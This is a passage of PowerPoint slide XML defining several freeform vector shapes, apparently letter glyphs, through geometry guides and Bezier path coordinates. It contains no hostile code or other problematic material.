                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="9"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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0" name="Freeform 151">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A838315-2E8D-4FC9-9B6F-523ACD187967}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId52"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3983039" y="3101975"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="114" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168"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1" name="Freeform 152">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5C1C4E9-F53A-4151-965B-855D80E8B6CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId53"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4084639" y="3103563"/>
              <a:ext cx="104775" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 249"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 249"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 249"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 34 h 218"/>
                <a:gd name="T12" fmla="*/ 42 w 249"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 249"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 249"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 249"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 249"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 249"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 75 h 218"/>
                <a:gd name="T34" fmla="*/ 172 w 249"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 132 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 229 w 249"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 249 w 249"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 249"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 249"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 249"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 249"/>
                <a:gd name="T55" fmla="*/ 2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9" h="218">
                  <a:moveTo>
                    <a:pt x="77" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="11"/>
                    <a:pt x="77" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="218"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="119" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="188"/>
                    <a:pt x="106" y="188"/>
                    <a:pt x="99" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="100"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="50"/>
                    <a:pt x="113" y="31"/>
                    <a:pt x="139" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="31"/>
                    <a:pt x="172" y="45"/>
                    <a:pt x="172" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="188"/>
                    <a:pt x="132" y="188"/>
                    <a:pt x="132" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="218"/>
                    <a:pt x="249" y="218"/>
                    <a:pt x="249" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="188"/>
                    <a:pt x="237" y="188"/>
                    <a:pt x="229" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="22"/>
                    <a:pt x="181" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="0"/>
                    <a:pt x="86" y="17"/>
                    <a:pt x="77" y="2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 name="Freeform 153">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FAD5BE3-FD37-4BA9-B278-C1AAA2E2B1E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId54"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4197351" y="3078163"/>
              <a:ext cx="88900" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 136 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="136" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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3" name="Freeform 154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3103FB55-AA3A-4019-A6C7-A1B651E96579}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId55"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4306889" y="3065463"/>
              <a:ext cx="106363" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 67 w 249"/>
                <a:gd name="T1" fmla="*/ 30 h 310"/>
                <a:gd name="T2" fmla="*/ 103 w 249"/>
                <a:gd name="T3" fmla="*/ 30 h 310"/>
                <a:gd name="T4" fmla="*/ 170 w 249"/>
                <a:gd name="T5" fmla="*/ 83 h 310"/>
                <a:gd name="T6" fmla="*/ 103 w 249"/>
                <a:gd name="T7" fmla="*/ 137 h 310"/>
                <a:gd name="T8" fmla="*/ 67 w 249"/>
                <a:gd name="T9" fmla="*/ 137 h 310"/>
                <a:gd name="T10" fmla="*/ 67 w 249"/>
                <a:gd name="T11" fmla="*/ 30 h 310"/>
                <a:gd name="T12" fmla="*/ 162 w 249"/>
                <a:gd name="T13" fmla="*/ 153 h 310"/>
                <a:gd name="T14" fmla="*/ 205 w 249"/>
                <a:gd name="T15" fmla="*/ 83 h 310"/>
                <a:gd name="T16" fmla="*/ 108 w 249"/>
                <a:gd name="T17" fmla="*/ 0 h 310"/>
                <a:gd name="T18" fmla="*/ 20 w 249"/>
                <a:gd name="T19" fmla="*/ 0 h 310"/>
                <a:gd name="T20" fmla="*/ 0 w 249"/>
                <a:gd name="T21" fmla="*/ 15 h 310"/>
                <a:gd name="T22" fmla="*/ 20 w 249"/>
                <a:gd name="T23" fmla="*/ 30 h 310"/>
                <a:gd name="T24" fmla="*/ 32 w 249"/>
                <a:gd name="T25" fmla="*/ 30 h 310"/>
                <a:gd name="T26" fmla="*/ 32 w 249"/>
                <a:gd name="T27" fmla="*/ 274 h 310"/>
                <a:gd name="T28" fmla="*/ 20 w 249"/>
                <a:gd name="T29" fmla="*/ 274 h 310"/>
                <a:gd name="T30" fmla="*/ 0 w 249"/>
                <a:gd name="T31" fmla="*/ 289 h 310"/>
                <a:gd name="T32" fmla="*/ 20 w 249"/>
                <a:gd name="T33" fmla="*/ 304 h 310"/>
                <a:gd name="T34" fmla="*/ 79 w 249"/>
                <a:gd name="T35" fmla="*/ 304 h 310"/>
                <a:gd name="T36" fmla="*/ 99 w 249"/>
                <a:gd name="T37" fmla="*/ 289 h 310"/>
                <a:gd name="T38" fmla="*/ 79 w 249"/>
                <a:gd name="T39" fmla="*/ 274 h 310"/>
                <a:gd name="T40" fmla="*/ 67 w 249"/>
                <a:gd name="T41" fmla="*/ 274 h 310"/>
                <a:gd name="T42" fmla="*/ 67 w 249"/>
                <a:gd name="T43" fmla="*/ 167 h 310"/>
                <a:gd name="T44" fmla="*/ 106 w 249"/>
                <a:gd name="T45" fmla="*/ 167 h 310"/>
                <a:gd name="T46" fmla="*/ 146 w 249"/>
                <a:gd name="T47" fmla="*/ 181 h 310"/>
                <a:gd name="T48" fmla="*/ 157 w 249"/>
                <a:gd name="T49" fmla="*/ 224 h 310"/>
                <a:gd name="T50" fmla="*/ 166 w 249"/>
                <a:gd name="T51" fmla="*/ 287 h 310"/>
                <a:gd name="T52" fmla="*/ 206 w 249"/>
                <a:gd name="T53" fmla="*/ 310 h 310"/>
                <a:gd name="T54" fmla="*/ 249 w 249"/>
                <a:gd name="T55" fmla="*/ 258 h 310"/>
                <a:gd name="T56" fmla="*/ 232 w 249"/>
                <a:gd name="T57" fmla="*/ 242 h 310"/>
                <a:gd name="T58" fmla="*/ 215 w 249"/>
                <a:gd name="T59" fmla="*/ 257 h 310"/>
                <a:gd name="T60" fmla="*/ 205 w 249"/>
                <a:gd name="T61" fmla="*/ 279 h 310"/>
                <a:gd name="T62" fmla="*/ 191 w 249"/>
                <a:gd name="T63" fmla="*/ 230 h 310"/>
                <a:gd name="T64" fmla="*/ 187 w 249"/>
                <a:gd name="T65" fmla="*/ 183 h 310"/>
                <a:gd name="T66" fmla="*/ 162 w 249"/>
                <a:gd name="T67" fmla="*/ 153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9" h="310">
                  <a:moveTo>
                    <a:pt x="67" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="30"/>
                    <a:pt x="170" y="59"/>
                    <a:pt x="170" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="108"/>
                    <a:pt x="148" y="137"/>
                    <a:pt x="103" y="137"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="67" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="30"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="162" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="134"/>
                    <a:pt x="205" y="104"/>
                    <a:pt x="205" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="40"/>
                    <a:pt x="167" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="32" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="12" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="304"/>
                    <a:pt x="99" y="304"/>
                    <a:pt x="99" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="274"/>
                    <a:pt x="87" y="274"/>
                    <a:pt x="79" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="67" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="167"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="167"/>
                    <a:pt x="130" y="167"/>
                    <a:pt x="146" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="192"/>
                    <a:pt x="157" y="203"/>
                    <a:pt x="157" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="256"/>
                    <a:pt x="157" y="271"/>
                    <a:pt x="166" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="302"/>
                    <a:pt x="189" y="310"/>
                    <a:pt x="206" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="310"/>
                    <a:pt x="249" y="277"/>
                    <a:pt x="249" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="242"/>
                    <a:pt x="237" y="242"/>
                    <a:pt x="232" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="242"/>
                    <a:pt x="215" y="242"/>
                    <a:pt x="215" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="261"/>
                    <a:pt x="214" y="279"/>
                    <a:pt x="205" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="279"/>
                    <a:pt x="191" y="256"/>
                    <a:pt x="191" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="199"/>
                    <a:pt x="191" y="195"/>
                    <a:pt x="187" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="169"/>
                    <a:pt x="169" y="158"/>
                    <a:pt x="162" y="15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4" name="Freeform 155">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B14AC03-F605-455C-897F-B4AF341948F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId56"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4425951" y="3101975"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="204" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="174"/>
                    <a:pt x="204" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="154"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
